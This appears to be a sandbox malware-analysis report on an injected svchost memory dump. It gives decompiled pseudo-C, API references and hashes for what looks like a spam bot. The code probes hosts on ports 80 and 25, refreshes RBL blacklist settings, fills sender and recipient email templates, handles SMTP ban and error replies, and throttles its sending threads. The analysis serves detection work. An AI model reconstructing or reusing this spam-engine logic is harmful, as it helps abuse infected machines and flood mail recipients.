• Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
Yara matches
Similarity
• API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
• String ID: runas
• API String ID: 3696105349-4000483414
• Opcode ID: eb82539e7a4e646050efe37842bf673145671e5b4c955fdb7623a1c263be125e
• Instruction ID: f3e3ba32bee3e78ba13b18646cb6d62af3cb6c4669bf19dbf4ecc9f9ff858fc8
• Opcode Fuzzy Hash: eb82539e7a4e646050efe37842bf673145671e5b4c955fdb7623a1c263be125e
                                                                                                                                  • Instruction Fuzzy Hash: D5A18CB2940259ABFB219FA0CC95FEE3BADFB45740F100426FA05D6181E7719948CFA9
Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 96%
			// Periodic housekeeping routine of the injected svchost payload. Three
			// timestamps are initialised once (bits 0..2 of *0x25222f4), two probe
			// loops over the pointer table at 0x2522000 re-run every 0xdbba0 ms
			// (900,000 ms = 15 min), and the "localcfg" entries "rbl_bl"/"rbl_ip"
			// and "net_type" are refreshed on a 0x12c/0x4b0 (300/1200) schedule.
			// E0251F04E(0) is only ever compared against 300 and 1200, so it is
			// presumed (assumption, not shown on this page) to return seconds.
			E02512011() {
				long _t35;
				void* _t45;
				intOrPtr _t47;
				void* _t51;
				char* _t53;
				char* _t58;
				intOrPtr _t96;
				signed int _t102;
				signed int _t103;
				void* _t104;
				void* _t122;

				if(( *0x25222f4 & 0x00000001) == 0) { // first call only: record three start times
					 *0x25222f4 =  *0x25222f4 | 0x00000001;
					 *0x25222f0 = E0251F04E(0);
				}
				if(( *0x25222f4 & 0x00000002) == 0) {
					 *0x25222f4 =  *0x25222f4 | 0x00000002;
					 *0x25222ec = E0251F04E(0);
				}
				if(( *0x25222f4 & 0x00000004) == 0) {
					 *0x25222f4 =  *0x25222f4 | 0x00000004;
					 *0x25222e8 = E0251F04E(0);
				}
				_t35 = GetTickCount();
				_t96 =  *((intOrPtr*)(_t104 + 0x114)); // state structure; +0x14 is the flag word later written as "net_type"
				if(_t35 -  *0x25222e0 > 0xdbba0) { // 0xdbba0 = 900,000 ms = 15 min since the last run
					_t58 =  *0x2522000; // 0x2520288
					_t103 = 0;
					if( *_t58 != 0) { // table of char* at 0x2522000, terminated by a pointer to an empty string
						_t60 = 0x2522000;
						do {
							if(E02512684( *_t60) == 0) {
								goto L11;
							} else {
								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000004; // first check passed (bit 2)
								if(E02511978(_t61, 0x50) != 0) { // 0x50 = 80; second argument is presumably a TCP port (assumption)
									_t12 = _t96 + 0x14;
									 *_t12 =  *(_t96 + 0x14) | 0x00000002; // second check passed (bit 1)
									__eflags =  *_t12;
								} else {
									goto L11;
								}
							}
							goto L14; // the first entry that passes both checks ends the loop
							L11:
							_t103 = _t103 + 1;
							_t60 = 0x2522000 + _t103 * 4;
						} while ( *((char*)( *(0x2522000 + _t103 * 4))) != 0);
					}
					L14:
					 *0x25222e0 = GetTickCount();
				}
				if(GetTickCount() -  *0x25222dc > 0xdbba0) { // same 15 min schedule, second pair of checks over the same table
					_t53 =  *0x2522000; // 0x2520288
					_t102 = 0;
					if( *_t53 != 0) {
						_t55 = 0x2522000;
						do {
							if(E02512EF8( *_t55) == 0) {
								goto L20;
							} else {
								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000008; // first check passed (bit 3)
								if(E02511978(_t56, 0x19) != 0) { // 0x19 = 25 (SMTP, if the argument is a port)
									_t18 = _t96 + 0x14;
									 *_t18 =  *(_t96 + 0x14) | 0x00000001; // second check passed (bit 0)
									__eflags =  *_t18;
								} else {
									goto L20;
								}
							}
							goto L23;
							L20:
							_t102 = _t102 + 1;
							_t55 = 0x2522000 + _t102 * 4;
						} while ( *((char*)( *(0x2522000 + _t102 * 4))) != 0);
					}
					L23:
					 *0x25222dc = GetTickCount();
				}
				 *(_t96 + 0x28) = GetTickCount() / 0x3e8; // 0x3e8 = 1000: system uptime in seconds
				 *((intOrPtr*)(_t96 + 0x2c)) = GetTickCount() / 0x3e8 -  *0x2522110; // seconds since the value kept at 0x2522110
				_t45 = E0251F04E(0) -  *0x25222f0;
				_t93 = "localcfg";
				_t122 = _t45 -  *0x25222e4; // 0x12c
				if(_t122 > 0) { // interval elapsed: 0x12c = 300 initially, 0x4b0 = 1200 once rbl data is present
					E0251E854(1, "localcfg", "rbl_bl", _t104 + 0x18, 0x100, 0x2520264); // read "rbl_bl" into a 0x100-byte stack buffer
					_t51 = E0251E819(1, _t93, "rbl_ip", 0); // read integer "rbl_ip", default 0
					_t104 = _t104 + 0x28;
					if(_t51 == 0) {
						L28:
						 *0x25222e4 = 0x12c; // nothing usable configured: retry in 300
					} else {
						_t124 =  *((intOrPtr*)(_t104 + 0x10));
						if( *((intOrPtr*)(_t104 + 0x10)) == 0) {
							goto L28;
						} else {
							_push(_t104 + 0x10);
							_push(_t51);
							 *((intOrPtr*)(_t96 + 0x38)) = E02511C5F(_t124);
							 *0x25222e4 = 0x4b0; // both values present: next refresh in 1200
						}
					}
				}
				_t47 = E0251F04E(0) -  *0x25222f0;
				if(_t47 > 0x4b0) { // every 1200: persist the flag word as "net_type" under "localcfg"
					E0251EA84(1, _t93, "net_type",  *(_t96 + 0x14));
					_t47 = E0251F04E(0);
					 *0x25222f0 = _t47;
				}
				return _t47;
			}
Instruction address column for the listing above (per-line alignment was lost in extraction): the function occupies 0x0251201e through 0x025121f5 in the 0x02510000 dump.
                                                                                                                                  0x025121f5
                                                                                                                                  0x02512204

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 02512078
                                                                                                                                  • GetTickCount.KERNEL32 ref: 025120D4
                                                                                                                                  • GetTickCount.KERNEL32 ref: 025120DB
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0251212B
                                                                                                                                  • GetTickCount.KERNEL32 ref: 02512132
                                                                                                                                  • GetTickCount.KERNEL32 ref: 02512142
                                                                                                                                    • Part of subcall function 0251F04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,0251E342,00000000,745CF210,80000001,00000000,0251E513,?,00000000,00000000,?,000000E4), ref: 0251F089
                                                                                                                                    • Part of subcall function 0251F04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,0251E342,00000000,745CF210,80000001,00000000,0251E513,?,00000000,00000000,?,000000E4,000000C8), ref: 0251F093
                                                                                                                                    • Part of subcall function 0251E854: lstrcpyA.KERNEL32(00000001,?,?,0251D8DF,00000001,localcfg,except_info,00100000,02520264), ref: 0251E88B
                                                                                                                                    • Part of subcall function 0251E854: lstrlenA.KERNEL32(00000001,?,0251D8DF,00000001,localcfg,except_info,00100000,02520264), ref: 0251E899
                                                                                                                                    • Part of subcall function 02511C5F: wsprintfA.USER32 ref: 02511CE1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$Time$FileSystem$lstrcpylstrlenwsprintf
                                                                                                                                  • String ID: 0 v$localcfg$net_type$rbl_bl$rbl_ip
                                                                                                                                  • API String ID: 3976553417-1551482228
                                                                                                                                  • Opcode ID: 8dfa0b3766a76e19d727456ed545f711086daffa93adf6d2d87fe16db366042e
                                                                                                                                  • Instruction ID: 504858d4cffb628e700fecb0480745053eaaf128f5e5ad9b9a679380fcc9fa06
                                                                                                                                  • Opcode Fuzzy Hash: 8dfa0b3766a76e19d727456ed545f711086daffa93adf6d2d87fe16db366042e
                                                                                                                                  • Instruction Fuzzy Hash: 03512E3898831A5EF738EF20ED45B663BD5BB42314F02091ADE06C60D0EBB5E55CEA1D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                  			E0251B3C5(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                  				char _v132;
                                                                                                                                  				void* _t46;
                                                                                                                                  				char* _t71;
                                                                                                                                  				intOrPtr _t72;
                                                                                                                                  				intOrPtr _t73;
                                                                                                                                  				intOrPtr _t75;
                                                                                                                                  				void* _t76;
                                                                                                                                  				void* _t77;
                                                                                                                                  
                                                                                                                                  				E02515CE1(_a4, 0x3e800, _a16, 0, 0);
                                                                                                                                  				E0251EF00( &_v132, "%FROM_EMAIL");
                                                                                                                                  				E02515CE1( &_v132, 0x64, _a16, 0, 0);
                                                                                                                                  				_t71 = E0251ED03( &_v132, 0x40);
                                                                                                                                  				_t77 = _t76 + 0x38;
                                                                                                                                  				_t83 = _t71;
                                                                                                                                  				if(_t71 != 0) {
                                                                                                                                  					_t7 = _t71 + 1; // 0x1
                                                                                                                                  					E0251EF7C(_t83, _a4, "%FROM_DOMAIN", _t7, 0x3e800, 0);
                                                                                                                                  					 *_t71 = 0;
                                                                                                                                  					E0251EF7C(_t83, _a4, "%FROM_USER",  &_v132, 0x3e800, 0);
                                                                                                                                  					_t77 = _t77 + 0x28;
                                                                                                                                  				}
                                                                                                                                  				_t72 = _a12;
                                                                                                                                  				E0251EF7C(_t83, _a4, "%TO_DOMAIN",  *((intOrPtr*)(_t72 + 0xc)), 0x3e800, 0);
                                                                                                                                  				wsprintfA( &_v132, "%s@%s",  *((intOrPtr*)(_t72 + 8)),  *((intOrPtr*)(_t72 + 0xc)));
                                                                                                                                  				E0251EF7C(_t83, _a4, "%TO_EMAIL",  &_v132, 0x3e800, 0);
                                                                                                                                  				_t73 = _a4;
                                                                                                                                  				E0251EF7C(_t83, _t73, "%TO_USER",  *((intOrPtr*)(_t72 + 4)), 0x3e800, 0);
                                                                                                                                  				_t46 = E0251F0CB( &_v132);
                                                                                                                                  				_push(0);
                                                                                                                                  				_push( &_v132);
                                                                                                                                  				_push(_t46);
                                                                                                                                  				E0251F133();
                                                                                                                                  				E0251EF7C(_t83, _t73, "%TO_HASH",  &_v132, 0x3e800, 0);
                                                                                                                                  				_push(_t73);
                                                                                                                                  				E0251AD89( &_v132, _t83);
                                                                                                                                  				E0251B211(0,  &_v132, 0);
                                                                                                                                  				E0251EF7C(_t83, _t73, "%DATE",  &_v132, 0x3e800, 0);
                                                                                                                                  				E0251B211(0,  &_v132, 5);
                                                                                                                                  				E0251EF7C(_t83, _t73, "%P5DATE",  &_v132, 0x3e800, 0);
                                                                                                                                  				E0251B211(0,  &_v132, 0xfffffffb);
                                                                                                                                  				E0251EF7C(_t83, _t73, "%M5DATE",  &_v132, 0x3e800, 0);
                                                                                                                                  				_t75 = _a8;
                                                                                                                                  				 *((char*)(E0251AEDD(_t75, _t73, 0x3e800) + _t75)) = 0;
                                                                                                                                  				return _t75;
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • wsprintfA.USER32 ref: 0251B467
                                                                                                                                    • Part of subcall function 0251EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0251EF92
                                                                                                                                    • Part of subcall function 0251EF7C: lstrlenA.KERNEL32(?), ref: 0251EF99
                                                                                                                                    • Part of subcall function 0251EF7C: lstrlenA.KERNEL32(00000000), ref: 0251EFA0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$wsprintf
                                                                                                                                  • String ID: %DATE$%FROM_DOMAIN$%FROM_EMAIL$%FROM_USER$%M5DATE$%P5DATE$%TO_DOMAIN$%TO_EMAIL$%TO_HASH$%TO_USER$%s@%s
                                                                                                                                  • API String ID: 1220175532-2340906255
                                                                                                                                  • Opcode ID: 2a34f6dc930918201237d4f617e830968ce31c62100a64864c90128d2348e4a7
                                                                                                                                  • Instruction ID: 59ae02e126ae225def1ba93ea009cad1dbcc7cdb71b7fd04625c68141f9f2a42
                                                                                                                                  • Opcode Fuzzy Hash: 2a34f6dc930918201237d4f617e830968ce31c62100a64864c90128d2348e4a7
                                                                                                                                  • Instruction Fuzzy Hash: 584171B284112A7EFF01BA94CCC1DFFBB6DFF99248F140015FD05B2080DA31A9188BA9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                  			E0251C2DC(void* __ebp, signed int _a4) {
                                                                                                                                  				void* _t86;
                                                                                                                                  				signed int _t90;
                                                                                                                                  				signed int _t91;
                                                                                                                                  				long _t93;
                                                                                                                                  				signed int _t95;
                                                                                                                                  				signed int _t101;
                                                                                                                                  				signed int _t108;
                                                                                                                                  				signed int _t112;
                                                                                                                                  				signed int _t115;
                                                                                                                                  				long _t117;
                                                                                                                                  				long _t118;
                                                                                                                                  				signed int _t120;
                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _t122;
                                                                                                                                  				signed int _t123;
                                                                                                                                  				signed int _t132;
                                                                                                                                  				signed int _t148;
                                                                                                                                  				signed char _t151;
                                                                                                                                  				signed int _t154;
                                                                                                                                  				signed int _t156;
                                                                                                                                  				signed char* _t157;
                                                                                                                                  				void* _t158;
                                                                                                                                  				signed int _t163;
                                                                                                                                  
                                                                                                                                  				_t158 = __ebp;
                                                                                                                                  				_t157 = _a4;
                                                                                                                                  				E0251A4C7(_t157);
                                                                                                                                  				_t122 = 0;
                                                                                                                                  				if(_t157[0x44] == 0) {
                                                                                                                                  					_t157[8] = 0;
                                                                                                                                  					_t157[0x34] = 0;
                                                                                                                                  					_t157[0x38] = 0;
                                                                                                                                  					_t157[0x3c] = 0;
                                                                                                                                  					_t157[0x54] = 0;
                                                                                                                                  					_t157[0x40] = 0;
        _t157[0x58] = 0;
        L31:
        _t82 =  &(_t157[4]); // 0x251c4e4
        _t86 = _t82;
        _t148 =  !( *_t157) & 0x00000001;
        _t157[0x5c] = _t122;
        _t84 =  &(_t157[8]); // 0xfffffdf0
        if( *_t86 >=  *_t84) {
            L34:
            return _t86;
        }
        _t86 = CreateThread(_t122, _t122, E0251B535, InterlockedIncrement(_t86) | _t148 << 0x00000010, _t122, _t122);
        if(_t86 == _t122) {
            goto L34;
        }
        return CloseHandle(_t86);
    }
    if(_t157[8] != 0) {
        __eflags = _t157[0x48];
        if(_t157[0x48] == 0) {
            L5:
            _t12 =  &(_t157[0x10]); // 0x59be026a
            _t90 =  *_t12;
            _t157[8] = _t90;
            _t157[0x34] = _t90;
            _t91 = _t90 * 0x3e8;
            __eflags = _t91;
            _t157[0x38] = _t122;
            _t157[0x3c] = _t122;
            _t157[0x1c] = _t90 * 0x2710;
            _t157[0x20] = _t91;
            goto L6;
        }
        _t118 = GetTickCount();
        _t11 =  &(_t157[0x48]); // 0x13740252
        __eflags = _t118 -  *_t11 - 0x927c0;
        if(_t118 -  *_t11 < 0x927c0) {
            goto L6;
        }
        goto L5;
    } else {
        _t4 =  &(_t157[0xc]); // 0x5756c359
        _t120 =  *_t4;
        _t157[0x1c] = _t120 * 0x2710;
        _t157[8] = _t120;
        _t157[0x20] = _t120 * 0x3e8;
        _t157[0x34] = _t120;
        _t157[0x48] = GetTickCount();
        L6:
        if(( *_t157 & 0x00000001) == 0) {
            _t73 =  &(_t157[0x34]); // 0xa1c35e5f
            _t157[8] =  *_t73;
            goto L31;
        }
        _t93 = GetTickCount();
        _t21 =  &(_t157[0x4c]); // 0x26fce850
        if(_t93 -  *_t21 >= 0x2710) {
            goto L31;
        }
        if(_t157[0x54] == _t122) {
            _t95 = 0x3e8;
        } else {
            _t117 = GetTickCount();
            _t23 =  &(_t157[0x54]); // 0x52366c1d
            _t95 = _t117 -  *_t23;
        }
        _t123 = _t95;
        if(_t95 < 1) {
            _t123 = 1;
        }
        if(_t123 > 0x4e20) {
            _t123 = 0x4e20;
        }
        _t24 =  &(_t157[0x58]); // 0x701d8902
        _t25 =  &(_t157[0x40]); // 0x74c33b57
        _t151 =  *_t25;
        _t132 =  *_t24 * 0x3e8;
        _push(_t158);
        asm("cdq");
        _push(0x14);
        _a4 = _t123;
        asm("cdq");
        _t101 = (_t132 - _t151) * _t123 / 0x3e8 / 0x3e8;
        if(_t101 == 0) {
            __eflags = _t132 - _t151;
            if(__eflags == 0) {
                goto L22;
            }
            if(__eflags >= 0) {
                _t156 = _t151 + 1;
                __eflags = _t156;
            } else {
                _t156 = _t151 - 1;
            }
            goto L21;
        } else {
            _t156 = _t151 + _t101;
            L21:
            _t157[0x40] = _t156;
            L22:
            if(_t157[0x40] < 0) {
                _t157[0x40] = _t157[0x40] & 0x00000000;
            }
            _t39 =  &(_t157[0x40]); // 0x74c33b57
            _t163 = (0xc8 -  *_t39) * 0x14;
            if(_t123 > 0x3e8) {
                _a4 = 0x3e8;
            }
            asm("cdq");
            _t46 =  &(_t157[0x14]); // 0x5f025220
            _t47 =  &(_t157[0x10]); // 0x59be026a
            asm("cdq");
            _t49 =  &(_t157[0x30]); // 0xe4754f45
            _t54 =  &(_t157[0x20]); // 0x406a0000
            _t108 = E0251A505(_t163 * _a4 / 0x3e8 /  *_t49 +  *_t54,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
            asm("cdq");
            _t56 =  &(_t157[0x2c]); // 0xc68314c4
            _t157[0x20] = _t108;
            _t112 = E0251A505(_t163 /  *_t56 + _t108,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
            asm("cdq");
            _t122 = 0;
            _t157[0x58] = 0;
            _t154 = _t112 / 0x3e8;
            _t157[0x54] = GetTickCount();
            _t68 =  &(_t157[0x34]); // 0xa1c35e5f
            _t115 =  *_t68;
            if(_t115 <= _t154) {
                _t157[8] = _t115;
                _t157[0x20] = _t115 * 0x3e8;
            } else {
                _t157[8] = _t154;
                _t157[0x1c] = _t154 * 0x2710;
            }
            goto L31;
        }
    }
}

Instruction addresses listed alongside the decompiled code (report address column, in listed order):
0x0251c2dc, 0x0251c2de, 0x0251c2e4, 0x0251c2e9, 0x0251c2ef, 0x0251c482, 0x0251c485, 0x0251c488, 0x0251c48b, 0x0251c48e, 0x0251c491, 0x0251c494, 0x0251c497, 0x0251c499, 0x0251c499, 0x0251c4a0, 0x0251c4a3, 0x0251c4a6, 0x0251c4a9, 0x0251c4d5, 0x0251c4d5, 0x0251c4d5, 0x0251c4c1, 0x0251c4c9, 0x00000000, 0x00000000, 0x00000000, 0x0251c4cc, 0x0251c2fe, 0x0251c326, 0x0251c329, 0x0251c337, 0x0251c337, 0x0251c337, 0x0251c342, 0x0251c345, 0x0251c348, 0x0251c348, 0x0251c34e, 0x0251c351, 0x0251c354, 0x0251c357, 0x00000000, 0x0251c357, 0x0251c32b, 0x0251c32d, 0x0251c330, 0x0251c335, 0x00000000, 0x00000000, 0x00000000, 0x0251c300, 0x0251c300, 0x0251c300, 0x0251c30b, 0x0251c316, 0x0251c319, 0x0251c31c, 0x0251c321, 0x0251c35a, 0x0251c35d, 0x0251c47a, 0x0251c47d, 0x00000000, 0x0251c47d, 0x0251c363, 0x0251c365, 0x0251c36d, 0x00000000, 0x00000000, 0x0251c376, 0x0251c37f, 0x0251c378, 0x0251c378, 0x0251c37a, 0x0251c37a, 0x0251c37a, 0x0251c384, 0x0251c389, 0x0251c38d, 0x0251c38d, 0x0251c395, 0x0251c397, 0x0251c397, 0x0251c399, 0x0251c39c, 0x0251c39c, 0x0251c39f, 0x0251c3ac, 0x0251c3ad, 0x0251c3b5, 0x0251c3b8, 0x0251c3bc, 0x0251c3bd, 0x0251c3c1, 0x0251c3c7, 0x0251c3c9, 0x00000000, 0x00000000, 0x0251c3cb, 0x0251c3d0, 0x0251c3d0, 0x0251c3cd, 0x0251c3cd, 0x0251c3cd, 0x00000000
                                                                                                                                  0x0251c3c3
                                                                                                                                  0x0251c3c3
                                                                                                                                  0x0251c3d1
                                                                                                                                  0x0251c3d1
                                                                                                                                  0x0251c3d4
                                                                                                                                  0x0251c3d8
                                                                                                                                  0x0251c3da
                                                                                                                                  0x0251c3da
                                                                                                                                  0x0251c3e3
                                                                                                                                  0x0251c3eb
                                                                                                                                  0x0251c3f0
                                                                                                                                  0x0251c3f2
                                                                                                                                  0x0251c3f2
                                                                                                                                  0x0251c3fd
                                                                                                                                  0x0251c405
                                                                                                                                  0x0251c408
                                                                                                                                  0x0251c419
                                                                                                                                  0x0251c41a
                                                                                                                                  0x0251c41d
                                                                                                                                  0x0251c421
                                                                                                                                  0x0251c42a
                                                                                                                                  0x0251c42b
                                                                                                                                  0x0251c430
                                                                                                                                  0x0251c436
                                                                                                                                  0x0251c43b
                                                                                                                                  0x0251c443
                                                                                                                                  0x0251c448
                                                                                                                                  0x0251c44b
                                                                                                                                  0x0251c453
                                                                                                                                  0x0251c456
                                                                                                                                  0x0251c456
                                                                                                                                  0x0251c45c
                                                                                                                                  0x0251c46c
                                                                                                                                  0x0251c475
                                                                                                                                  0x0251c45e
                                                                                                                                  0x0251c45e
                                                                                                                                  0x0251c467
                                                                                                                                  0x0251c467
                                                                                                                                  0x00000000
                                                                                                                                  0x0251c45c
                                                                                                                                  0x0251c3c1

APIs
  • Part of subcall function 0251A4C7: GetTickCount.KERNEL32 ref: 0251A4D1
  • Part of subcall function 0251A4C7: InterlockedExchange.KERNEL32(?,00000001), ref: 0251A4FA
• GetTickCount.KERNEL32 ref: 0251C31F
• GetTickCount.KERNEL32 ref: 0251C32B
• GetTickCount.KERNEL32 ref: 0251C363
• GetTickCount.KERNEL32 ref: 0251C378
• GetTickCount.KERNEL32 ref: 0251C44D
• InterlockedIncrement.KERNEL32(0251C4E4), ref: 0251C4AE
• CreateThread.KERNEL32(00000000,00000000,0251B535,00000000,?,0251C4E0), ref: 0251C4C1
• CloseHandle.KERNEL32(00000000,?,0251C4E0,02523588,02518810), ref: 0251C4CC
Strings
Memory Dump Source
• Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
Yara matches
Similarity
• API ID: CountTick$Interlocked$CloseCreateExchangeHandleIncrementThread
• String ID: 0 v$localcfg
• API String ID: 1553760989-2166502722
• Opcode ID: 2fa339fd2ed3ba7c1af9fbaf5669194e1d57da1d86e6de27dacfdc49dd02b683
• Instruction ID: 469008a47a009a1900a706975913077a8cb4ceadb5b96aca64da55946e89cca9
• Opcode Fuzzy Hash: 2fa339fd2ed3ba7c1af9fbaf5669194e1d57da1d86e6de27dacfdc49dd02b683
• Instruction Fuzzy Hash: FB519AB1A40B418FE7248F69C5C562ABBE9FB48305B505D3ED18BC7A90D771F844CB19
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                  			E0251BE31(signed int _a4, intOrPtr _a8) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				CHAR* _v12;
                                                                                                                                  				int _v16;
                                                                                                                                  				int _t50;
                                                                                                                                  				int _t51;
                                                                                                                                  				intOrPtr _t52;
                                                                                                                                  				intOrPtr _t55;
                                                                                                                                  				intOrPtr _t57;
                                                                                                                                  				void* _t59;
                                                                                                                                  				char* _t66;
                                                                                                                                  				CHAR* _t68;
                                                                                                                                  				int _t71;
                                                                                                                                  				int _t72;
                                                                                                                                  				void* _t76;
                                                                                                                                  				intOrPtr _t78;
                                                                                                                                  				signed int _t82;
                                                                                                                                  				signed int _t83;
                                                                                                                                  				signed int _t84;
                                                                                                                                  				intOrPtr* _t86;
                                                                                                                                  				void* _t88;
                                                                                                                                  				void* _t91;
                                                                                                                                  				void* _t92;
                                                                                                                                  
                                                                                                                                  				_t83 = _a4;
                                                                                                                                  				_t68 = _t83 + 4;
                                                                                                                                  				_v12 = _t68;
                                                                                                                                  				if(lstrcmpiA(_t68, "smtp_herr") == 0 || lstrcmpiA(_t68, "smtp_ban") == 0) {
                                                                                                                                  					L3:
                                                                                                                                  					_t72 = 0;
                                                                                                                                  					_v16 = 0;
                                                                                                                                  					if(_a8 == 3) {
                                                                                                                                  						L25:
                                                                                                                                  						if(lstrcmpiA(_v12, "smtp_herr") != 0) {
                                                                                                                                  							if(lstrcmpiA(_v12, "smtp_ban") != 0) {
                                                                                                                                  								_t50 = lstrcmpiA(_v12, "smtp_retr");
                                                                                                                                  								_t51 = 0x2523638;
                                                                                                                                  								if(_t50 != 0) {
                                                                                                                                  									_t51 = _a4;
                                                                                                                                  								}
                                                                                                                                  							} else {
                                                                                                                                  								_t51 = 0x2523634;
                                                                                                                                  							}
                                                                                                                                  						} else {
                                                                                                                                  							_t51 = 0x2523630;
                                                                                                                                  						}
                                                                                                                                  						_t86 =  *_t51;
                                                                                                                                  						 *_t51 = _v16;
                                                                                                                                  						if(_t86 == 0) {
                                                                                                                                  							goto L36;
                                                                                                                                  						} else {
                                                                                                                                  							_t52 =  *_t86;
                                                                                                                                  							_t84 = 0;
                                                                                                                                  							while(_t52 != 0) {
                                                                                                                                  								E0251EC2E(_t52);
                                                                                                                                  								_t84 = _t84 + 1;
                                                                                                                                  								_t52 =  *((intOrPtr*)(_t86 + _t84 * 4));
                                                                                                                                  							}
                                                                                                                                  							return E0251EC2E(_t86);
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					_t55 =  *((intOrPtr*)(_t83 + 0x18));
                                                                                                                                  					_t82 = 0;
                                                                                                                                  					if(_t55 <= 0) {
                                                                                                                                  						goto L25;
                                                                                                                                  					} else {
                                                                                                                                  						goto L5;
                                                                                                                                  					}
                                                                                                                                  					do {
                                                                                                                                  						L5:
                                                                                                                                  						if( *((char*)(_t83 + _t72 + 0x24)) == 0xa || _t72 == _t55 - 1) {
                                                                                                                                  							_t82 = _t82 + 1;
                                                                                                                                  						}
                                                                                                                                  						_t72 = _t72 + 1;
                                                                                                                                  					} while (_t72 < _t55);
                                                                                                                                  					if(_t82 == 0) {
                                                                                                                                  						goto L25;
                                                                                                                                  					}
                                                                                                                                  					_t70 = 4 + _t82 * 4;
                                                                                                                                  					_t51 = E0251EBCC(4 + _t82 * 4);
                                                                                                                                  					_pop(_t76);
                                                                                                                                  					_v16 = _t51;
                                                                                                                                  					if(_t51 == 0) {
                                                                                                                                  						goto L36;
                                                                                                                                  					}
                                                                                                                                  					E0251EE2A(_t76, _t51, 0, _t70);
                                                                                                                                  					_t57 =  *((intOrPtr*)(_t83 + 0x18));
                                                                                                                                  					_v8 = _v8 & 0x00000000;
                                                                                                                                  					_a4 = _a4 & 0x00000000;
                                                                                                                                  					_t92 = _t91 + 0xc;
                                                                                                                                  					if(_t57 > 0) {
                                                                                                                                  						_t71 = _v16;
                                                                                                                                  						do {
                                                                                                                                  							_t78 =  *((intOrPtr*)(_t83 + _a4 + 0x24));
                                                                                                                                  							if(_t78 == 0xa || _a4 == _t57 - 1) {
                                                                                                                                  								_t88 = _a4 - _v8;
                                                                                                                                  								if(_t78 != 0xa) {
                                                                                                                                  									_t88 = _t88 + 1;
                                                                                                                                  								}
                                                                                                                                  								_t25 = _t88 + 1; // 0x1
                                                                                                                                  								_t59 = E0251EBCC(_t25);
                                                                                                                                  								 *_t71 = _t59;
                                                                                                                                  								if(_t59 == 0) {
                                                                                                                                  									goto L25;
                                                                                                                                  								} else {
                                                                                                                                  									E0251EE08(_t59, _t83 + _v8 + 0x24, _t88);
                                                                                                                                  									_t92 = _t92 + 0xc;
                                                                                                                                  									 *((char*)(_t88 +  *_t71)) = 0;
                                                                                                                                  									if(_t88 > 0) {
                                                                                                                                  										_t31 =  *_t71 - 1; // -1
                                                                                                                                  										_t66 = _t88 + _t31;
                                                                                                                                  										if( *_t66 == 0xd) {
                                        *_t66 = 0;
                                    }
                                }
                                _t71 = _t71 + 4;
                                _v8 = _v8 + _t88 + 1;
                                goto L22;
                            }
                        }
                        L22:
                        _a4 = _a4 + 1;
                        _t57 =  *((intOrPtr*)(_t83 + 0x18));
                    } while (_a4 < _t57);
                }
                goto L25;
            } else {
                _t51 = lstrcmpiA(_t68, "smtp_retr");
                if(_t51 != 0) {
                    L36:
                    return _t51;
                }
                goto L3;
            }
        }
Instruction address listing for this function (0x0251be40 .. 0x0251bfcd); only the address column survived the export, the instruction text did not.

APIs
• lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0251BE4F
• lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0251BE5B
• lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0251BE67
• lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0251BF6A
• lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0251BF7F
• lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0251BF94
Strings
Memory Dump Source
• Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
Yara matches
Similarity
• API ID: lstrcmpi
• String ID: smtp_ban$smtp_herr$smtp_retr
• API String ID: 1586166983-1625972887
• Opcode ID: f18a775f4ab24fa1d0c2654282547320cf2480ee1278363e422c2e21107b3841
• Instruction ID: 288c36f6dc7e2e8da478b1783a045cdfd87526a9cc7319b05ec3c159f6faf448
• Opcode Fuzzy Hash: f18a775f4ab24fa1d0c2654282547320cf2480ee1278363e422c2e21107b3841
